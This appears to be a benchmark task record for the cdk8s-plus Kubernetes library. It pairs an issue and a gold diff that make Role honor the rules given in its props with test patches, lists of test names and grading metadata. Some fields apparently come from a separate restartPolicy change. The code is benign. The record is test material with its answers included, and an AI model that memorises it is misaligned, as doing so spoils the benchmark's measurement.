of file +}); + +test('Containers should not specify "restartPolicy" field', () => { + const chart = Testing.chart(); + new kplus.Pod(chart, 'Pod', { + containers: [{ image: 'image', restartPolicy: ContainerRestartPolicy.ALWAYS }], + }); + expect(() => Testing.synth(chart)).toThrowError(); +}); +
[ "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"restartPolicy\" property can be used to define restartPolicy", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "Containers should not specify \"restartPolicy\" field", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
[ "can grant permissions on imported", "defaults", "custom", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "default child", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "defaultChild", "minimal definition", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "fromCommand", "fromHttpGet", "fromTcpSocket", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "Synthesizes spec lazily", "default update strategy", "custom update strategy", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "role can bind to imported", "secrets can be added to the service account", "auto mounting token can be disabled", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "targets a deployment that has containers with volume mounts", "default configuration", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "custom configuration", "can select namespaces", "can select all namespaces", "Can mutate metadata", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom" ]
Enum: ContainerRestartPolicy Location: src/container.ts Inputs: – (enum members) Outputs: string values representing Kubernetes restart policy for init containers. Currently only `ALWAYS = 'Always'`. Description: Enum used to specify the `restartPolicy` field on init containers. The only supported value is `ALWAYS`, which maps to the Kubernetes value `"Always"` and is allowed only for init containers (treated as side‑car containers). Method: Pod.addInitContainer Location: src/pod.ts (method of class `Pod` / abstract base `AbstractPod`) Inputs: - `props: ContainerProps & { readonly restartPolicy?: ContainerRestartPolicy }` – container configuration for the init container; `restartPolicy` is optional and must be one of the `ContainerRestartPolicy` enum values (currently only `ALWAYS`). Outputs: `Container` – the created init‑container object that is added to the pod’s `initContainers` list. Description: Adds an init container to the pod. When a `restartPolicy` is supplied it is propagated to the underlying Kubernetes manifest; the only accepted value is `ALWAYS`, which causes the init container to be restarted continuously until the pod’s regular containers finish. Constructor / validation (implicit interface change) Location: src/pod.ts (inside the `Pod` constructor or `AbstractPod` init logic) Inputs: `containers: ContainerProps[]` – list of regular containers passed to the pod definition; each element may now include an optional `restartPolicy?: ContainerRestartPolicy`. Outputs: Throws `Error` if any regular container includes a non‑empty `restartPolicy` field. Description: Enforces the rule that `restartPolicy` can be set only on init containers. If a regular container specifies it, pod synthesis fails with an informative error, as verified by the test case.
Apache-2.0
{ "base_image_name": "node_16", "install": [ "npm install" ], "log_parser": "parse_log_js_4", "test_cmd": "npx jest --verbose --no-colors --testLocationInResults" }
{ "num_modified_files": 2, "num_modified_lines": 41, "pr_author": "cdk8s-automation", "pr_labels": [ "auto-approve: Pull requests that should be auto approved" ], "llm_metadata": { "code": "B4", "code_quality": null, "confidence": 0.92, "detected_issues": { "B1": false, "B2": false, "B3": false, "B4": true, "B5": false, "B6": false }, "detected_issues_explanation": null, "detecte d_issues": null, "difficulty": "medium", "external_urls": [ "https://github.com/sqren/backport", "https://github.com/cdk8s-team/cdk8s-plus/pull/3812" ], "intent_completeness": "partial", "patch": null, "pr_categories": [ "core_feat" ], "reason": null, "reasoning": "The issue requests adding support for a `restartPolicy` field on containers, essentially a feature addition. The provided tests check that init containers can set this field, that the generated manifest includes it, and that setting it on regular containers throws an error, which is not described in the issue text. This mismatch shows the specification is incomplete, leading to an ambiguous spec (B4). Tests otherwise align with the intended behavior, so no other B‑category problems are present.", "suggested_fixes": null, "test_alignment": null, "test_alignment_issues": [ "Tests expect an error when `restartPolicy` is set on non‑init containers, a requirement not mentioned in the issue description" ], "test_alignment_quick_tree": null, "test_alignment_quick_tree_bootstrap": null, "test_alignment_quick_tree_mocks": null, "test_alignment_quick_tree_params": null, "test_alignment_quick_tree_unrelated": null, "test_alignment_quick_tree_use_hook": null, "test_alignment_quick_tree_use_hook_unrelated": null, "test_alignment_sample_without_replacement": null, "test_alignment_test_alignment_sample_without_replacement": null, "test_build_phylogeny": null, "test_build_phylogeny_unrelated": null, "test_build_phylogeny_use_hook": null, "test_build_phylogeny_use_hook_unrelated": null, "test_core_seq_test_sample_motif_length_1": null, "test_core_seq_test_sample_motif_length_3": null, "test_core_seq_test_sample_without_replacement": null, "test_core_sequence": null, "test_core_sequence_test_sample_motif_length_1": null, "test_core_sequence_test_sample_motif_length_3": null, "test_core_sequence_test_sample_without_replacement": null, "test_sample_motif_length_1": null, "test_sample_motif_length_3": null, "test_sample_without_replacement": null } }
6bbed4a739b5aa35f6a396a57e2a2e36893cd56b
2024-04-18 07:26:13
cdk8s-team__cdk8s-plus-4046
diff --git a/src/role.ts b/src/role.ts index bdf4eb93..0da4b118 100644 --- a/src/role.ts +++ b/src/role.ts @@ -104,6 +104,10 @@ export class Role extends base.Resource implements IRole { metadata: props.metadata, rules: Lazy.any({ produce: () => this.synthesizeRules() }), }); + + for (const rule of props.rules ?? []) { + this.allow(rule.verbs, ...rule.resources); + } } /** @@ -546,4 +550,4 @@ export class ClusterRole extends base.Resource implements IClusterRole, IRole { return { clusterRoleSelectors: [{ matchLabels: this._labelSelector }] }; } -} \ No newline at end of file +}
fix(role): use rules coming from the roleProps (#3813) # Backport This will backport the following commits from `k8s-29/main` to `k8s-27/main`: - [fix(role): use rules coming from the roleProps (#3813)](https://github.com/cdk8s-team/cdk8s-plus/pull/3813) <!--- Backport version: 8.5.0 --> ### Questions ? Please refer to the [Backport tool documentation](https://github.com/sqren/backport)
**Title** Fix Role to honor rules supplied via `roleProps` **Problem** When a Role is instantiated with an explicit `rules` array, those rules are not reflected in the resulting Kubernetes Role manifest. This omission can lead to missing permissions for workloads that rely on the declared rules. **Root Cause** The constructor ignored the `rules` property from the supplied props, only generating rules lazily without registering the user‑provided entries. **Fix / Expected Behavior** - The constructor now processes any `rules` provided in the props and registers them through the existing `allow` mechanism. - Registered rules become part of the lazily synthesized rule set, appearing in the final Role manifest. - If no rules are supplied, the behavior remains unchanged. - Existing deduplication and merging logic continues to apply to the newly added rules. **Risk & Validation** - Run the full test suite to ensure no regression for Roles without explicit rules. - Add/verify tests that a Role created with `rules` in props outputs those rules correctly in the manifest. - Confirm that other RBAC resources (ClusterRole, etc.) are unaffected by the change.
4,046
cdk8s-team/cdk8s-plus
diff --git a/test/role.test.ts b/test/role.test.ts index d63180de..e2314754 100644 --- a/test/role.test.ts +++ b/test/role.test.ts @@ -154,6 +154,32 @@ Array [ }); + test('specify access from props', () => { + + // GIVEN + const chart = Testing.chart(); + + // WHEN + new kplus.Role(chart, 'my-role', { + rules: [ + { + verbs: ['get', 'list', 'watch'], + resources: [kplus.ApiResource.PODS], + }, + ], + }); + + // THEN + const manifest = Testing.synth(chart); + expect(manifest[0].rules).toEqual(expect.arrayContaining([ + { + apiGroups: [''], + resources: ['pods'], + verbs: ['get', 'list', 'watch'], + }, + ])); + }); + test('giving access to a single pod and all pods still gives access to all pods', () => { // GIVEN @@ -546,4 +572,4 @@ Object { }); -}); \ No newline at end of file +});
[ "specify access from props" ]
[ "defaults to the container port", "specific port", "options", "minimal usage", "specific port and hostname", "defaultChild", "defaults", "can select namespaces", "can select all namespaces", "default child", "custom", "a label selector is automatically allocated", "no selector is generated if \"select\" is false", "can select by label", "Can be isolated", "can grant permissions on imported", "role can bind to imported", "minimal definition", "secrets can be added to the service account", "auto mounting token can be disabled", "Can mutate metadata", "Allows setting all options", "Applies default restart policy to pod spec", "Does not modify existing restart policy of pod spec", "Synthesizes spec lazily", "Can add only resource requests", "Can add only resource limits", "Can add only limits and requests on memory", "Can add only limits and requests on cpu", "Can add only limits and requests on emphemeral-storage", "Can add only limits on emphemeral-storage", "default security context", "custom security context", "can configure a postStart lifecycle hook", "can configure a preStop lifecycle hook", "Can be created from value", "Can be created from config map name", "Can be created from secret value", "Can be created from ISecret.envValue", "Can be created from new secret.envValue", "Cannot be created from missing required process env", "Can be created from missing optional process env", "Can be created from existing process env", "Can be created from fieldRef", "Can be created from fieldRef with key", "Can not be created from fieldRef without key", "Can be created from resourceFieldRef", "Can be created from resourceFieldRef with divisor", "Can be created from resourceFieldRef with container", "cannot configure identical ports and protocols at instantiation", "can configure identical ports with different protocols at instantiation", "cannot add an already existing port number with identical protocol", "can add an already existing port number with a different protocol", "cannot add an already existing port name", "can configure multiple ports", "portNumber is equivalent to port", "Instantiation properties are all respected", "Must use container props", "Can add environment variable", "can add environment variables from a source", "can add environment variables from a secret", "Can mount container to volume", "can mount container to a pv", "mount options", "mount from ctor", "\"startupProbe\" property has defaults if port is provided", "\"startupProbe\" property is undefined if port is not provided", "\"readiness\", \"liveness\", and \"startup\" can be used to define probes", "Can add resource limits and requests", "can create a RoleBinding from a Role", "can create a RoleBinding from a ClusterRole", "can call bindInNamespace multiple times", "can create a ClusterRoleBinding from a ClusterRole", "can bind a ServiceAccount to a role", "can add subjects to a RoleBinding after creating it", "Can be imported from secret name", "Can create a new secret", "Can add data to new secrets", "Can create a basic auth secret", "can override the name of a basic auth secret", "Can create an ssh auth secret", "can override the name of an ssh auth secret", "Can create a service account token secret", "can override the name of a service account token secret", "can add annotations to a service account token secret", "Can create a TLS secret", "can override the name of a tls secret", "Can create a Docker config secret", "can override the name of a DockerConfig secret", "default immutability", "can configure an immutable generic secret", "can configure an immutable basic auth secret", "can configure an immutable ssh auth secret", "can configure an immutable service account token secret", "can configure an immutable tls secret", "can configure an immutable docker config secret", "minimal", "with data", "with binaryData", "with binaryData and data", "\"binaryData\" and \"data\" cannot share keys", "addData()/addBinaryDataq() can be used to add data", "addData() and addBinaryData() throw if key already used", "addFile() adds local files to the config map", "metadata is synthesized", "can configure an immutable config map", "sub-directories are skipped", "keys are based on file names", "\"prefix\" can be used to prefix keys\"", "\"exclude\" exclusion via globs", "can be imported", "can be bounded to a volume at instantiation", "can be bounded to a volume post instantiation", "no-ops if bounded twice to the same volume", "throws if bounded twice to different volumes", "default configuration", "custom configuration", "A label selector is automatically allocated", "No selector is generated if \"select\" is false", "Can select by label", "StatefulSet gets defaults", "StatefulSet allows overrides", "default update strategy", "custom update strategy", "IngressClassName can be set", "fromResource", "if the service exposes a port, it will be used by the ingress", "fails if the service does not expose a port", "fails if a port is explicitly specified, and the service is exposed through a different port", "service exposes a single port and its the same as the backend", "service exposes multiple ports and the backend uses one of them", "fails if backend does not specify port and service exposes multiple ports", "service exposes multiple ports and backend uses a different one", "addHostDefaultBackend()", "addHostRule()", "addRule()", "define rules upon initialization", "fails if path does not begin with \"/\"", "fails if no rules or default backend are specified", "addTls()", "define tls upon initialization", "defaultBackend property", "addDefaultBackend()", "using addDefaultBackend()", "defaultBackend and rules", "two rules for the same path (no host)", "two rules for the same path and host", "can be reserved with default storage class", "can be reserved with a custom storage class", "reserved claim is created in the same namespace as the volume", "throws if reserved twice", "can be bound to a claim at instantiation", "can be bound to a claim post instantiation", "no-ops if bounded twice to the same claim", "throws if bounded twice to different claims", "volume name is trimmed if needed", "custom volume name", "default mode", "optional", "items", "items are sorted by key for deterministic synthesis", "items are sorted by key for determinstic synthesis", "default medium", "memory medium", "size limit", "fromCommand", "fromHttpGet", "fromTcpSocket", "ipv4", "throws on invalid ipv4 cidr", "ipv6", "throws on invalid ipv6 cidr", "anyIpv4", "anyIpv6", "tcp", "tcpRange", "allTcp", "udp", "udpRange", "allUcp", "of", "can create a policy for a managed pod", "can create a policy for a managed workload resource", "can create a policy for selected pods", "can create a policy for all pods", "can create a policy that allows all ingress by default", "can create a policy that denies all ingress by default", "can create a policy that allows all egress by default", "can create a policy that denies all egress by default", "cannot create a policy for a selector that selects pods in multiple namespaces", "cannot create a policy for a selector that selects pods in namespaces based on labels", "policy namespace defaults to selector namespace", "can add ingress from an ip block", "can add ingress from a managed pod", "can add ingress from a managed workload resource", "can add ingress from pods selected without namespaces", "can add ingress from pods selected with namespaces selected by labes", "can add ingress from pods selected with namespaces selected by names", "can add ingress from all pods", "can add ingress from managed namespace", "can add ingress from selected namespaces", "can add ingress from all namespaces", "can add egress to an ip block", "can add egress to a managed pod", "can add egress to a managed workload resource", "can add egress to pods selected without namespaces", "can add egress to pods selected with namespaces selected by labes", "can add egress to pods selected with namespaces selected by names", "can add egress to all pods", "can add egress to managed namespace", "can add egress to selected namespaces", "can add egress to all namespaces", "targets a deployment that has containers with volume mounts", "creates HPA with 2 default scaleUp policies and 1 default scaleDown policy, when all other scaleUp and scaleDown options are provided", "creates HPA with scaleUp and scaleDown policies with the default 15 second periodSeconds, when policies are provided without duration option", "creates HPA with two different scaling strategies, when provided a scaleUp strategy of Max and scaleDown strategy of Min", "creates HPA with CPU ContainerResource metric, when provided a Metric.containerCpu()", "creates HPA with Memory ContainerResource metric, when provided a Metric.containerMemory()", "creates HPA with Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with Ephemeral Storage ContainerResource metric, when provided a Metric.containerStorage()", "creates HPA with external metric, when provided a Metric.external()", "creates HPA with object metric, when provided a Metric.object()", "creates HPA with pods metric, when provided a Metric.pods()", "creates HPA with Resource CPU metric, when provided a Metric.resourceCpu()", "creates HPA with Resource Memory metric, when provided a Metric.resourceMemory()", "creates HPA with Resource Storage metric, when provided a Metric.resourceStorage()", "creates HPA with Resource Ephemeral Storage metric, when provided a Metric.resourceEphemeralStorage()", "creates HPA with Resource CPU metric targeting 70% average utilization, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting 47.2 average value, when provided a MetricTarget.averageUtilization()", "creates HPA with Resource CPU metric targeting the exact value of 29.5, when provided a MetricTarget.value()", "creates HPA, when target is a deployment", "creates HPA, when target is a StatefulSet", "creates HPA, when minReplicas is same as maxReplicas", "creates HPA with expected spec, when metrics, scaleUp, and scaleDown are all configured", "creates HPA, when metrics are not provided and one of the two target containers does not have any resources limits/requests", "throws error at synth, when metrics are not provided and target container does not have resource constraints specified", "throws error, when minReplicas is more than maxReplicas", "throws error, when scaleUp.stabilizationWindow is more than 1 hour", "throws error, when scaleDown.stabilizationWindow is more than 1 hour", "throws error, when scaleUp.stabilizationWindow is -1", "throws error, when scaleDown.stabilizationWindow is -1 seconds", "throws error, when scaleUp policy has a duration longer than 30 minutes", "throws error, when scaleDown policy has a duration longer than 30 minutes", "throws error, when scaleUp policy has a duration set to 0", "throws error, when scaleDown policy has a duration set to 0", "throws error, when scaleUp policy has a duration set to -10 minutes", "throws error, when scaleDown policy has a duration set to -10 minutes", "throws error at synth, when Deployment target has replicas defined", "throws error at synth, when StatefulSet target has replicas defined", "Must be configured with at least one port", "Can provide cluster IP", "can select a deployment", "Can serve by port", "Must set externalIPs if provided", "Must be configured with externalName if type is EXTERNAL_NAME", "Type defaults to EXTERNAL_NAME if externalName if given", "Can restrict CIDR IP addresses for a LoadBalancer type", "can be exposed by an ingress", "Can be exposed as via ingress", "Expose uses the correct default values", "Expose can set service and port details", "Cannot be exposed if there are no containers in spec", "default deployment strategy", "custom deployment strategy", "rolling update deployment strategy with a custom maxSurge and maxUnavailable", "throws is maxSurge and maxUnavailable is set to zero for rolling update", "PercentOrAbsoulte zero", "default minReadySeconds", "default progressDeadlineSeconds", "can configure minReadySeconds", "can configure progressDeadlineSeconds", "throws if minReadySeconds > progressDeadlineSeconds", "throws if minReadySeconds = progressDeadlineSeconds", "can select with expressions", "exposing via a service preserves deployment namespace", "expose captures all container ports", "cannot expose with a port not owned by the container", "expose via service with multiple ports throws error when names are not provided", "can tolerate tainted nodes", "can be assigned to a node by name", "can be attracted to a node by selector - default", "can be attracted to a node by selector - custom", "can be co-located with a managed deployment - default", "can be co-located with a managed deployment - custom", "can be co-located with an unmanaged deployment - default", "can be co-located with an unmanaged deployment - custom", "can be spread - default", "can be spread - custom", "spread set to true", "can be separated from a managed deployment - default", "can be separated from a managed deployment - custom", "can be separated from an unmanaged deployment - default", "can be separated from an unmanaged deployment - custom", "with a custom resource rule", "can be allowed read access to a pod and secret", "can be allowed read access to a mix of resources", "giving access to a single pod and all pods still gives access to all pods", "can be allowed read access to all pods and secrets in a namespace", "can be allowed read access to a custom resource type", "can be allowed access to a specific resource and a resource type", "with a custom non-resource rule", "can be allowed read access to all pods and secrets in the cluster", "can be allowed access to a specific resource, a resource type, and non resource endpoints", "can be aggregated", "custom aggregation labels can be added", "fails with two volumes with the same name", "fails adding a volume with the same name", "fails with a container that has mounts with different volumes of the same name", "can configure multiple mounts with the same volume", "Can add container post instantiation", "Can attach an existing container post instantiation", "Must have at least one container", "Can add volume post instantiation", "Automatically adds volumes from container mounts", "init containers cannot have liveness probe", "init containers cannot have readiness probe", "init containers cannot have startup probe", "can specify init containers at instantiation", "can add init container post instantiation", "init container names are indexed", "automatically adds volumes from init container mounts", "custom host aliases", "default dns settings", "custom dns settings", "throws if more than 3 nameservers are configured", "throws if more than 6 search domains are configured", "throws if no nameservers are given when dns policy is set to NONE", "can configure auth to docker registry", "auto mounting token defaults to true", "can select pods", "can pass an existing secret as the docker auth", "can add hostNetwork to pod", "pod hostNetwork is not added by default", "default termination grace period", "custom termination grace period", "custom termination grace period - minutes", "only NO_EXECUTE taint queries can specify eviction", "can be co-located with a managed pod - default", "can be co-located with a managed pod - custom", "can be co-located with an unmanaged pod - default", "can be co-located with an unmanaged pod - custom", "can be separated from a managed pod - default", "can be separated from a managed pod - custom", "can be separated from an unmanaged pod - default", "can be separated from an unmanaged pod - custom", "can allow to ip block", "can isolate pod", "can allow to managed pod", "can allow to managed workload resource", "can allow to pods selected without namespaces", "can allow to pods selected with namespaces selected by names", "cannot allow to pods selected with namespaces selected by labels", "cannot allow to pods selected in all namespaces", "can allow to all pods", "can allow to managed namespace", "can allow to namespaces selected by name", "cannot allow to namespaces selected by labels", "can allow to peer across namespaces", "can allow to multiple peers", "cannot allow to the same peer twice", "allow to create an ingress policy in source namespace when peer doesnt define namespaces", "allow to with peer isolation creates only ingress policy on peer", "allow to with pod isolation creates only egress policy on pod", "allow to defaults to peer container ports", "can allow from ip block", "can allow from managed pod", "can allow from managed workload resource", "can allow from pods selected without namespaces", "can allow from pods selected with namespaces selected by names", "cannot allow from pods selected with namespaces selected by labels", "cannot allow from pods selected in all namespaces", "can allow from all pods", "can allow from managed namespace", "can allow from namespaces selected by name", "cannot allow from namespaces selected by labels", "can allow from peer across namespaces", "can allow from multiple peers", "cannot allow from the same peer twice", "allow from create an ingress policy in source namespace when peer doesnt define namespaces", "allow from with peer isolation creates only ingress policy on peer", "allow from with pod isolation creates only egress policy on pod", "allow from defaults to peer container ports", "can grant read permissions to a user", "can grant read permissions to a group", "can grant read permissions to a service account", "can grant read permissions to another pod", "can grant read permissions to workload", "can grant read permissions twice with different subjects", "cannot grant permissions twice with same subject" ]
